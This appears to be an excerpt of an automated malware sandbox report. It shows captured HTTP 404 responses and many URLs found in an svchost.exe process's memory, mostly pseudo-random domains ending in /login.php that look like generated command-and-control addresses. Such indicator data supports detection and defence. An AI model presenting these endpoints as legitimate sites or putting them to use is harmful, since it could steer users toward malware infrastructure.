cfL4;desc="?proto=TCP&rtt=1293&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=15d0f1ed8208f477&ts=776&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="44.8",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="17.6",amp_optimizer;dur="22.8"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ%2BJ%2Bm8hfbFG1si9e3uB4EnLW%2Fk8IiSwdNLKuFf8m5kfNPwuodid%2FoheG3DpGI12BBbXMpa8EvxDTS9Jk8LDBR4RX%2FWmdnXsQjiX9jCqkuYdROSle9UDxpnd%2F%2BxRwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1007518df21906-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2533683&cwnd=236&unsent_bytes=0&cid=fcf2c50331b3e5db&ts=1519&x=0"
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Mon, 11 Nov 2024 17:33:43 GMT
        Content-Type: text/html; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        vary: Accept-Encoding
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
        server-timing: amp_sanitizer;dur="44.1",amp_style_sanitizer;dur="21.7",amp_tag_and_attribute_sanitizer;dur="16.3",amp_optimizer;dur="22.3"
        cf-cache-status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4jZP%2Bi4gO9cxDFlQTghfu8eZWQaOEn4J7YzW7gHt2sYZJJgatUxEa0cg3Tu0JD8%2F2hc635bqvIzijXW1Cj8pMACoiOAYEG5fj2hedUpXkoZvvzc8nvAStVTvhkz3g%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8e100760285c36c3-YYZ
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=12197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236543&cwnd=76&unsent_bytes=0&cid=3e04c6c75e3a395b&ts=1506&x=0"
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Mon, 11 Nov 2024 17:35:04 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        vary: Accept-Encoding
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
        cf-cache-status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJiUugFuator45Efysh1gibMhXPmo%2Bb6HH0jrBTYky%2BIRwCHsgl5%2By%2B3h%2BPW45sBDx9zPR%2Fcv5Uc8OzwuOUZD0PmzkdBGAmAjLLpEBxhS3vI6xeREDxjlzLrj8pmfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8e1009630817422f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=60d719d5bbb6fb72&ts=1355&x=0"
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Mon, 11 Nov 2024 17:35:06 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        vary: Accept-Encoding
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
        cf-cache-status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4NET2WR9%2FwTbZSCRThkcXg6sf35VPYv%2FcoT27yeOvT2zzuT28d4qTBDjGR3aXNqiPSrD%2FWZvZ6nmEAr0XoMgIrqDBpezhm6TF6O400VZVpmGqz0J9vJam1lQvfs8BA%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8e10096fdadf8c21-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1987645&cwnd=251&unsent_bytes=0&cid=37722d2a241cb4e3&ts=800&x=0"
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx/1.14.0 (Ubuntu)
        Date: Mon, 11 Nov 2024 17:33:08 GMT
        Content-Type: text/html
        Content-Length: 580
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 11 Nov 2024 17:33:10 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 11 Nov 2024 17:33:11 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: openresty/1.21.4.3
        Date: Mon, 11 Nov 2024 17:33:14 GMT
        Content-Type: text/html
        Content-Length: 561
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: openresty/1.21.4.3
        Date: Mon, 11 Nov 2024 17:33:15 GMT
        Content-Type: text/html
        Content-Length: 561
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 11 Nov 2024 17:33:20 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: keep-alive
        ETag: "663ee226-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx/1.14.0 (Ubuntu)
        Date: Mon, 11 Nov 2024 17:33:34 GMT
        Content-Type: text/html
        Content-Length: 580
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 11 Nov 2024 17:33:34 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 11 Nov 2024 17:33:35 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: openresty/1.21.4.3
        Date: Mon, 11 Nov 2024 17:33:38 GMT
        Content-Type: text/html
        Content-Length: 561
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: openresty/1.21.4.3
        Date: Mon, 11 Nov 2024 17:33:39 GMT
        Content-Type: text/html
        Content-Length: 561
        Connection: keep-alive
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:33:44 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:33:47 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:35:02 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:35:03 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:35:05 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
    Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:35:05 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyz.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhob.com/H
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhob.com/login.php
    Source: svchost.exe, 00000002.00000003.1590675413.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591229349.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017552428.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606063186.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595288365.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594416015.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602654258.00000000029FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhys.com/login.php
    Source: svchost.exe, 00000002.00000003.2063012726.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykeb.com/login.php
    Source: svchost.exe, 00000002.00000003.1580252694.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykih.com/login.php
    Source: svchost.exe, 00000002.00000003.1580252694.00000000029FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykih.com/login.phpcom/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynus.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynuw.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682310382.00000000060EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682790360.00000000060EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684847120.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587992390.0000000003C33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683500672.00000000060EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681672330.00000000060E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqub.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyraw.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639974314.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643724869.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyruh.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvab.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvab.com/login.php
    Source: svchost.exe, 00000002.00000003.1579481931.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585285219.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591194658.0000000006008000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydoz.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106093549.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090770576.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2091016673.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
